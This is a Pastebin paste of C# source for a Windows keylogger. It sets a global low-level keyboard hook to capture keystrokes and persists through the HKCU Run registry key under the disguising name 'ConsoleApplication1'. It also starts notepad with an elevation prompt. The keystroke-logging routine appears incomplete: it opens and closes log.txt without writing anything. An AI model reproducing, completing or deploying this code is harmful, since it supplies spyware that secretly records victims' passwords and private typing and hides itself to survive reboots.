Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- using System;
- using Microsoft.Win32;
- using System.Collections.Generic;
- using System.Linq;
- using System.Text;
- using System.Threading.Tasks;
- using System.Runtime.InteropServices;
- using System.Threading;
- using System.Windows.Forms;
- using System.IO;
- using System.Diagnostics;
- namespace keylogger
- {
- public class Program
- {
- private const int WH_KEYBOARD_LL = 13;
- private const int WM_KEYDOWN = 0x0100;
- private static LowLevelKeyboardProc _proc = HookCallBack;
- private static IntPtr _hookID = IntPtr.Zero;
- static void Main()
- {
- Prog.RunRegistry();
- _hookID = SetHook(_proc);
- Application.Run();
- UnhookWindowsHookEx(_hookID);
- }
- [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
- private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
- [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
- [return: MarshalAs(UnmanagedType.Bool)]
- private static extern bool UnhookWindowsHookEx(IntPtr hhk);
- [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
- private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);
- [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
- private static extern IntPtr GetModuleHandle(string lpModuleName);
- private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
- private static IntPtr SetHook(LowLevelKeyboardProc proc)
- {
- using (Process curProcess = Process.GetCurrentProcess())
- using (ProcessModule curModule = curProcess.MainModule)
- {
- return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0);
- }
- }
- private static IntPtr HookCallBack(int nCode, IntPtr wParam, IntPtr lParam)
- {
- if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
- {
- int vkCode = Marshal.ReadInt32(lParam);
- //Console.WriteLine((Keys)vkCode);
- StreamWriter sw = new StreamWriter(Application.StartupPath + @"\log.txt", true);
- sw.Close();
- }
- return CallNextHookEx(_hookID, nCode, wParam, lParam);
- }
- }
- public class Prog
- {
- public static void RunRegistry()
- {
- var exPath = Application.ExecutablePath;
- var reg = Registry.CurrentUser.GetValue("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ConsoleApplication1", exPath);
- if (reg != null)
- {
- var Reg = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
- if (Reg != null)
- {
- var path = Reg.GetValue("ConsoleApplication1", exPath).ToString();
- var res = path.Equals("\"" + exPath + "\"", StringComparison.Ordinal);
- Reg.SetValue("ConsoleApplication1", "\"" + Application.ExecutablePath + "\"");
- }
- Reg.Close();
- }
- if (reg == null)
- {
- var add = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
- if (add == null)
- {
- return;
- }
- add.SetValue("ConsoleApplication1", "\"" + Application.ExecutablePath + "\"");
- add.Close();
- }
- var info = new ProcessStartInfo(@"C:\Windows\System32\notepad.exe")
- {
- UseShellExecute = true,
- Verb = "runas"
- };
- Process.Start(info);
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement